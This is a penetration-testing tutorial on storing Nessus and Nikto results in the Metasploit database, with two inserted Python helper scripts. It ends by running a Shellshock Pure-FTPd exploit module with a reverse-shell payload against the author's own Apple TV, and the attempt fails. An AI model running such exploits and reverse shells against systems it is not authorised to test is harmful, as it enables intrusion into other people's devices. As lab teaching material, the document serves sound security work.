
Using the Metasploit database (advanced)


By: Johan Grotherus

September 1, 2015

In my first tutorial I demonstrated the basic usage of the Metasploit database: how to run nmap from within the Metasploit console, how to import nmap scans, and how to display the stored information. Now we will look a bit deeper into what the Metasploit database can do, and see what it looks like when importing data from other tools such as Nikto and Nessus. Both tools are very popular. Nikto is a free web application scanner. Nessus comes in a free version, which is quite limited, and a professional version, which is quite powerful. In this demo, I will use the free version of Nessus and store the data in the Metasploit database.

Below you see the syntax for importing a previously saved Nessus scan result file into Metasploit. The file must be in the .nessus format for Metasploit to be able to import it. In this example, I have done a credentialed scan of my jailbroken Apple TV just to highlight some of the vulnerabilities a Nessus scan can find.

First we switch to the test workspace from the basic tutorial, where we already have some data stored.

    msf > workspace test
    [*] Workspace: test
    msf >

Then we do the import from Nessus.

    msf > db_import /root/Downloads/Apple_TV_scan_g5sugv.nessus
    [*] Importing 'Nessus XML (v2)' data
    [*] Importing host 192.168.1.11
    [*] Successfully imported /root/Downloads/Apple_TV_scan_g5sugv.nessus
    msf >

It is also possible to launch a Nessus scan from within Metasploit, but that requires you to know the ID of a scan you have already created within Nessus before calling it from Metasploit. So for this tutorial, I will stick with importing a Nessus scan.

If we run the hosts command again we now see the following:

    msf > hosts

    Hosts
    =====

    address       mac                name            os_name   os_flavor  os_sp  purpose  info  comments
    -------       ---                ----            -------   ---------  -----  -------  ----  --------
    192.168.1.1   08:63:61:8e:8f:4e  homerouter.cpe  Unknown                     device
    192.168.1.3   90:72:40:04:88:4b                  Unknown                     device
    192.168.1.11  b8:17:c2:c9:7e:b5  192.168.1.11    Mac OS X                    device

    msf >

We have one more host, 192.168.1.11, which is my Apple TV box.

If we run services we see:

    msf > services

    Services
    ========

    host          port   proto  name              state     info
    ----          ----   -----  ----              -----     ----
    192.168.1.1   22     tcp    ssh               open
    192.168.1.1   8081   tcp    blackice-icecap   filtered
    192.168.1.1   23     tcp    telnet            filtered
    192.168.1.1   53     tcp    domain            open
    192.168.1.1   80     tcp    http              open
    192.168.1.1   443    tcp    https             open
    192.168.1.1   631    tcp    ipp               filtered
    192.168.1.1   3000   tcp    ppp               open
    192.168.1.3   445    tcp    microsoft-ds      open
    192.168.1.3   548    tcp    afp               open
    192.168.1.3   139    tcp    netbios-ssn       open
    192.168.1.3   10000  tcp    snet-sensor-mgmt  open
    192.168.1.3   5009   tcp    airport-admin     open
    192.168.1.11  5353   udp    mdns              open
    192.168.1.11  3689   tcp    www               open
    192.168.1.11  5000   tcp    rtsp              open
    192.168.1.11  7000   tcp    www               open
    192.168.1.11  7100   tcp    www               open
    192.168.1.11  22     tcp    ssh               open
    192.168.1.11  9777   udp                      open
    192.168.1.11  123    udp                      open
    192.168.1.11  62078  tcp                      open
    192.168.1.11  63907  udp                      open

    msf >

Now we can use the vulns command to see if there are any vulnerabilities that Nessus found and that are now included in our Metasploit database. As there are a lot of them for my Apple TV, I will only list some.

    msf > vulns
    [*] Time: 2015-08-30 07:57:06 UTC Vuln: host=192.168.1.11 name=Backported Security Patch Detection (SSH) refs=NSS-39520
    [*] Time: 2015-08-30 07:57:06 UTC Vuln: host=192.168.1.11 name=Common Platform Enumeration (CPE) refs=NSS-45590
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Mac OS X < 10.10 Multiple Vulnerabilities refs=CVE-2011-2391
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock) refs=CVE-2014-6277,CVE-2014-6278,BID-70165,BID-70166,OSVDB-112158,OSVDB-112169,CERT-252743,IAVA-2014-A-0142,EDB-ID-34860,MSF-CUPS Filter Bash Environment Variable Code Injection,NSS-78067
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Device Type refs=NSS-54615
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=OS Identification refs=NSS-11936
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (Shellshock) refs=CVE-2014-6271,BID-70103,OSVDB-112004,EDB-ID-34765,IAVA-2014-A-0142,EDB-ID-34766,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-77823
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Time of Last System Startup refs=NSS-56468
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Ethernet Card Manufacturer Detection refs=NSS-35716
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock) refs=CVE-2014-7169,BID-70137,OSVDB-112004,CERT-252743,IAVA-2014-A-0142,EDB-ID-34765,EDB-ID-34766,EDB-ID-34777,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-78385
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Authenticated Check : OS Name and Installed Package Enumeration refs=NSS-12634
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Apple TV < 7.0.3 Multiple Vulnerabilities refs=CVE-2014-3192
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Apple TV Detection refs=NSS-42825
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Apple iTunes Music Sharing Enabled refs=NSS-20217
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=HTTP Server Type and Version refs=NSS-10107
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=RTSP Server Type / Version Detection refs=NSS-10762
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Default Password (alpine) for 'root' Account refs=CVE-1999-0502,MSF-SSH User Code Execution,NSS-42367
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Protocol Versions Supported refs=NSS-10881
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SFTP Supported refs=NSS-72663
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Weak MAC Algorithms Enabled refs=NSS-71049
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Server CBC Mode Ciphers Enabled refs=CVE-2008-5161,BID-32319,OSVDB-50035,OSVDB-50036,CERT-958563,CWE-200,NSS-70658
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Algorithms and Languages Supported refs=NSS-70657
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Server Type and Version Information refs=NSS-10267
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection (HELP Request) refs=NSS-11153
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=mDNS Detection (Local Network) refs=NSS-66717
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Traceroute Information refs=NSS-10287
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=TCP/IP Timestamps Supported refs=NSS-25220
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Netstat Connection Information refs=NSS-64582
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Netstat Active Connections refs=NSS-58651
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
    msf >

As you can see, there are several, and they all relate to the Apple TV I scanned with Nessus and imported into the Metasploit database. Vulnerabilities are of course very interesting, and some of these might be exploitable, which is what Metasploit is all about. One thing to note here is the advantage of using multiple tools to find information and then storing that data in Metasploit, which is the premier attack tool for exploiting machines. In a sense, we get the best of two worlds.

As I said I would, I also import my Nikto scan. Remember, you have to save your Nikto scan in XML format for Metasploit to be able to import it.

    msf > db_import /root/nikto.xml
    [*] Importing 'Nikto XML' data
    [*] Importing host 192.168.1.1
    [*] Successfully imported /root/nikto.xml
    msf >

Unfortunately, Nikto was unable to detect any vulnerabilities in my web application, so the vulnerabilities listed above are the ones we can play with.

I will also mention that both the hosts and services commands have several flags you can play with, allowing you for example to add a host (-a) or delete a host (-d). The help command shows all the flags for a particular command, as seen below.

    msf > help hosts
    Usage: hosts [ options ] [addr1 addr2 ...]

    OPTIONS:
      -a,--add          Add the hosts instead of searching
      -d,--delete       Delete the hosts instead of searching
      -c <col1,col2>    Only show the given columns (see list below)
      -h,--help         Show this help information
      -u,--up           Only show hosts which are up
      -o <file>         Send output to a file in csv format
      -R,--rhosts       Set RHOSTS from the results of the search
      -S,--search       Search string to filter by
      -i,--info         Change the info of a host
      -n,--name         Change the name of a host
      -m,--comment      Change the comment of a host
      -t,--tag          Add or specify a tag to a range of hosts

    Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags

    msf >

If we go back to our vulnerabilities, we can also use the vulns command to search for specific ones, such as the infamous Shellshock vulnerability that was listed. We use the -S parameter with the vulns command, as seen below. This lists only the vulnerabilities where "Shellshock" appears in the name.

    msf > vulns -S shellshock
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock) refs=CVE-2014-6277,CVE-2014-6278,BID-70165,BID-70166,OSVDB-112158,OSVDB-112169,CERT-252743,IAVA-2014-A-0142,EDB-ID-34860,MSF-CUPS Filter Bash Environment Variable Code Injection,NSS-78067
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (Shellshock) refs=CVE-2014-6271,BID-70103,OSVDB-112004,EDB-ID-34765,IAVA-2014-A-0142,EDB-ID-34766,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-77823
    [*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock) refs=CVE-2014-7169,BID-70137,OSVDB-112004,CERT-252743,IAVA-2014-A-0142,EDB-ID-34765,EDB-ID-34766,EDB-ID-34777,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-78385
    msf >

In our next step, let's search the Metasploit exploit library to find a match. We use the built-in search command for this.
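As an added example (it is not code from this tutorial and not Metasploit's own db_import code), here is a small Python reader for the .nessus v2 format that db_import consumed above. It pulls out the same three kinds of record that the hosts, services and vulns commands displayed, flattens references into the CVE-/BID-/NSS- style seen in the vulns output, and implements the case-insensitive name search that vulns -S performed. The XML document inside it is constructed for the example; the element and attribute names (ReportHost, HostProperties, ReportItem, pluginID, cve, bid) are the real Nessus v2 ones.

```python
# Added example: minimal reader for Nessus v2 (.nessus) export files. Not part
# of the tutorial and not Metasploit's importer; it records the same things
# (hosts, services, findings), prints findings in the `vulns` line style and
# offers the case-insensitive name search that `vulns -S` performs.
# The document below is constructed for this example.
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

SAMPLE_NESSUS = """<?xml version="1.0"?>
<NessusClientData_v2><Report name="Apple_TV_scan">
<ReportHost name="192.168.1.11">
  <HostProperties>
    <tag name="host-ip">192.168.1.11</tag>
    <tag name="mac-address">b8:17:c2:c9:7e:b5</tag>
    <tag name="operating-system">Mac OS X</tag>
  </HostProperties>
  <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="1" pluginID="70658"
              pluginName="SSH Server CBC Mode Ciphers Enabled" pluginFamily="Misc.">
    <cve>CVE-2008-5161</cve><bid>32319</bid><risk_factor>Low</risk_factor>
  </ReportItem>
  <ReportItem port="0" svc_name="general" protocol="tcp" severity="4" pluginID="78385"
              pluginName="Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)"
              pluginFamily="General">
    <cve>CVE-2014-7169</cve><bid>70137</bid><risk_factor>Critical</risk_factor>
  </ReportItem>
  <ReportItem port="3689" svc_name="www" protocol="tcp" severity="0" pluginID="10107"
              pluginName="HTTP Server Type and Version" pluginFamily="Web Servers">
    <risk_factor>None</risk_factor>
  </ReportItem>
</ReportHost>
</Report></NessusClientData_v2>
"""


@dataclass
class Finding:
    host: str
    port: int
    proto: str
    name: str
    severity: int                                  # Nessus scale: 0 info .. 4 critical
    refs: list = field(default_factory=list)


@dataclass
class HostRecord:
    address: str
    mac: str = ""
    os_name: str = ""
    services: set = field(default_factory=set)     # (port, proto, svc_name)
    findings: list = field(default_factory=list)


def parse_nessus(xml_text):
    """Parse a Nessus v2 document into HostRecord objects keyed by IP address."""
    hosts = {}
    for rh in ET.fromstring(xml_text).iter("ReportHost"):
        props = {t.get("name"): (t.text or "") for t in rh.iter("tag")}
        addr = props.get("host-ip") or rh.get("name")
        rec = hosts.setdefault(addr, HostRecord(address=addr))
        rec.mac = props.get("mac-address", rec.mac)
        rec.os_name = props.get("operating-system", rec.os_name)
        for item in rh.iter("ReportItem"):
            port, proto = int(item.get("port", "0")), item.get("protocol", "tcp")
            if port:   # port 0 is the Nessus "general" pseudo-service, not a listener
                rec.services.add((port, proto, item.get("svc_name", "")))
            # Flatten references into the prefixes seen in the vulns output:
            # CVE ids as-is, BID-<id>, and NSS-<pluginID> for the Nessus plugin.
            refs = [c.text for c in item.findall("cve")]
            refs += [f"BID-{b.text}" for b in item.findall("bid")]
            refs.append(f"NSS-{item.get('pluginID')}")
            rec.findings.append(Finding(addr, port, proto, item.get("pluginName", ""),
                                        int(item.get("severity", "0")), refs))
    return hosts


def search_vulns(hosts, needle, min_severity=0):
    """Case-insensitive substring match on finding names (like `vulns -S`),
    optionally dropping findings below a Nessus severity level."""
    needle = needle.lower()
    return [f for h in hosts.values() for f in h.findings
            if needle in f.name.lower() and f.severity >= min_severity]


def format_vuln(f):
    """Render a finding in the `Vuln: host=... name=... refs=...` style msfconsole prints."""
    return f"Vuln: host={f.host} name={f.name} refs={','.join(f.refs)}"


if __name__ == "__main__":
    hosts = parse_nessus(SAMPLE_NESSUS)
    for h in hosts.values():
        print(h.address, h.mac, h.os_name, sorted(h.services))
    for f in search_vulns(hosts, "shellshock"):
        print(format_vuln(f))
    print(len(search_vulns(hosts, "", min_severity=1)), "findings rated Low or above")
```

Running the file prints the host record, the Shellshock finding in the vulns line style, and a severity count. Severity is something the msfconsole vulns listing does not show, which is why it is worth keeping when you post-process an import: it separates the informational plugins in the long list above (the Service Detection and netstat entries) from findings that describe an actual weakness.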
As you can see, we get three matches.

    msf > search shellshock

    Matching Modules
    ================

    Name                                      Disclosure Date  Rank       Description
    ----                                      ---------------  ----       -----------
    auxiliary/server/dhclient_bash_env        2014-09-24       normal     DHCP Client Bash Environment Variable Code Injection
    exploit/multi/ftp/pureftpd_bash_env_exec  2014-09-24       excellent  Pure-FTPd External Authentication Bash Environment Variable Code Injection
    exploit/multi/http/cups_bash_env_exec     2014-09-24       good       CUPS Filter Bash Environment Variable Code Injection

    msf >

If you look closely, you see that there is a Pure-FTPd bash exploit that is rated excellent and that is also referenced (as MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection) in the vulnerabilities from our previous search. This looks like a splendid candidate to try.

That brings us to the last step of this tutorial: loading data into the exploit settings directly from the information in the Metasploit database.

First, we select the Pure-FTPd exploit.

    msf > use exploit/multi/ftp/pureftpd_bash_env_exec
    msf exploit(pureftpd_bash_env_exec) >

We look at the options for this exploit and notice that we need to set RHOST. This can be done by querying the Metasploit database.

    msf exploit(pureftpd_bash_env_exec) > show options

    Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPATH  /bin             yes       Target PATH for binaries used by the CmdStager
       RPORT  21               yes       The target port

    Exploit target:

       Id  Name
       --  ----
       0   Linux x86

    msf exploit(pureftpd_bash_env_exec) >

Let's see if we can find the Apple TV machine in our database. With this exploit, you can see that there is no RHOSTS variable, only a RHOST variable.
So, in this case it will not be possible to use the -R flag with the hosts command to populate the RHOST variable with the search result. Many auxiliary modules do support the RHOSTS variable, where this would work. Below is an example of setting the RHOSTS variable.

    msf exploit(pureftpd_bash_env_exec) > hosts -S Mac -R

    Hosts
    =====

    address       mac                name          os_name   os_flavor  os_sp  purpose  info  comments
    -------       ---                ----          -------   ---------  -----  -------  ----  --------
    192.168.1.11  b8:17:c2:c9:7e:b5  192.168.1.11  Mac OS X                    device

    RHOSTS => 192.168.1.11
    msf exploit(pureftpd_bash_env_exec) >

However, running show options below verifies that the RHOST variable is still not set, since the command above only works when the RHOSTS variable is available. Unfortunately Metasploit will not output an error but instead simply reports the RHOSTS variable being set. So, always make sure to use show options to check that all your variables have been set.

    msf exploit(pureftpd_bash_env_exec) > show options

    Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPATH  /bin             yes       Target PATH for binaries used by the CmdStager
       RPORT  21               yes       The target port

    Payload options (generic/shell_reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.1.6      yes       The listen address
       LPORT  4444             yes       The listen port

    Exploit target:

       Id  Name
       --  ----
       0   Linux x86

    msf exploit(pureftpd_bash_env_exec) >

So, we set the RHOST variable manually and run show options again.

    msf exploit(pureftpd_bash_env_exec) > set RHOST 192.168.1.11
    RHOST => 192.168.1.11
    msf exploit(pureftpd_bash_env_exec) > show options

    Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  192.168.1.11     yes       The target address
       RPATH  /bin             yes       Target PATH for binaries used by the CmdStager
       RPORT  21               yes       The target port

    Payload options (generic/shell_reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.1.6      yes       The listen address
       LPORT  4444             yes       The listen port

    Exploit target:

       Id  Name
       --  ----
       0   Linux x86

    msf exploit(pureftpd_bash_env_exec) >

OK, all set. If we are happy with the default payload we can simply execute the exploit attempt by entering either exploit or run.

    msf exploit(pureftpd_bash_env_exec) > run

    [*] Started reverse handler on 192.168.1.6:4444
    [-] Exploit aborted due to failure: bad-config: 192.168.1.11:21 - Failed to store payload inside executable, please select a native payload

That did not work, and a little research tells us that there is a problem with the default payload option. So we select another payload and try to run the exploit again.

    msf exploit(pureftpd_bash_env_exec) > set PAYLOAD linux/x86/shell_reverse_tcp
    PAYLOAD => linux/x86/shell_reverse_tcp
    msf exploit(pureftpd_bash_env_exec) > run

    [*] Started reverse handler on 192.168.1.6:4444
    [-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.11:21).
    msf exploit(pureftpd_bash_env_exec) >

Unfortunately it fails. Sometimes it is not as easy to exploit a machine as it might appear. Vulnerability scanners such as Nessus might be wrong, and exploits might fail. Looking back at the services listing, nothing was recorded on port 21 for 192.168.1.11, which is consistent with the refused connection: the Shellshock findings came from the credentialed scan, and the MSF- entry in their refs is a cross-reference to a module for the same CVEs, not evidence that Pure-FTPd is running.

Nevertheless, there is a great advantage in using the Metasploit database as a store for information you collect with other tools. Hopefully I have demonstrated some of the benefits of using the Metasploit database. There are things I have not demonstrated yet, so feel free to really explore the different options of the Metasploit database.

I will leave you with two things. The first is the -o flag, which you can use with several of the database commands in Metasploit; try it with services -o and hosts -o. It exports the data in CSV format, which can be valuable. The last thing is the help command. Simply type help and you will get a list of all available commands; here is the section for the Metasploit database.

    Database Backend Commands
    =========================

        Command           Description
        -------           -----------
        creds             List all credentials in the database
        db_connect        Connect to an existing database
        db_disconnect     Disconnect from the current database instance
        db_export         Export a file containing the contents of the database
        db_import         Import a scan result file (filetype will be auto-detected)
        db_nmap           Executes nmap and records the output automatically
        db_rebuild_cache  Rebuilds the database-stored module cache
        db_status         Show the current database status
        hosts             List all hosts in the database
        loot              List all loot in the database
        notes             List all notes in the database
        services          List all services in the database
        vulns             List all vulnerabilities in the database
        workspace         Switch between database workspaces

The only thing that remains is to say good luck in using the Metasploit database.
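One more added example, for the RHOST/RHOSTS pitfall shown earlier (this is not code from the tutorial and not part of Metasploit): a Python parser for the fixed-width tables that show options prints, plus a check that lists every option marked Required whose Current Setting is empty. The transcript inside it is constructed to match the state after hosts -S Mac -R, when RHOSTS had been set but the module only has RHOST. The set_option function models what the console does with set NAME value, including the fact that it accepts a name the module does not use without complaint.

```python
# Added example: parse msfconsole `show options` output and flag required
# options that are still empty. Not part of the tutorial and not Metasploit
# code. The transcript below is constructed to match the tutorial's situation:
# `hosts -S Mac -R` populated RHOSTS, but this module only has RHOST.
import re

SHOW_OPTIONS = """\
Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPATH  /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT  21               yes       The target port

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.6      yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86
"""


def _column_starts(dash_line):
    """Column offsets are where each run of dashes in the underline row begins."""
    return [m.start() for m in re.finditer(r"-+", dash_line)]


def _cells(line, starts):
    """Slice a fixed-width row at the column offsets; empty cells stay empty."""
    bounds = starts + [None]
    return [line[a:b].strip() for a, b in zip(bounds, bounds[1:])]


def parse_show_options(text):
    """Map each section title ('Module options (...)', 'Payload options (...)',
    'Exploit target') to a list of row dicts keyed by that table's headers."""
    sections, title, lines, i = {}, None, text.splitlines(), 0
    while i < len(lines):
        line = lines[i]
        if re.fullmatch(r"\S.*:", line):                       # section title line
            title = line[:-1]
            sections[title] = []
        elif title and i + 1 < len(lines) and re.fullmatch(r"\s*-+(\s+-+)*\s*", lines[i + 1]):
            starts = _column_starts(lines[i + 1])
            headers = _cells(line, starts)
            i += 2                                             # skip header + underline
            while i < len(lines) and lines[i].strip():
                sections[title].append(dict(zip(headers, _cells(lines[i], starts))))
                i += 1
            continue
        i += 1
    return sections


def set_option(sections, name, value):
    """Model `set NAME value`: update matching rows and report whether any option
    by that name exists. msfconsole prints 'NAME => value' either way and does
    not warn when NAME is not an option of the loaded module."""
    hit = False
    for rows in sections.values():
        for row in rows:
            if row.get("Name") == name:
                row["Current Setting"] = value
                hit = True
    return hit


def missing_required(sections):
    """(section, option) pairs that are Required=yes but have no Current Setting."""
    return [(title, row["Name"]) for title, rows in sections.items() for row in rows
            if row.get("Required") == "yes" and not row.get("Current Setting")]


if __name__ == "__main__":
    opts = parse_show_options(SHOW_OPTIONS)
    print("after hosts -S Mac -R :", missing_required(opts))   # RHOST still empty
    set_option(opts, "RHOSTS", "192.168.1.11")                 # what -R actually set
    print("after RHOSTS => ...   :", missing_required(opts))   # unchanged
    set_option(opts, "RHOST", "192.168.1.11")
    print("after set RHOST       :", missing_required(opts))   # nothing left
```

Parsing by the dashed underline row rather than splitting on whitespace is what keeps the empty RHOST cell in place; a whitespace split would silently shift "yes" into the Current Setting column and hide the problem. The same parser works on a saved console log, so the check can be run over a transcript before the settings are reused.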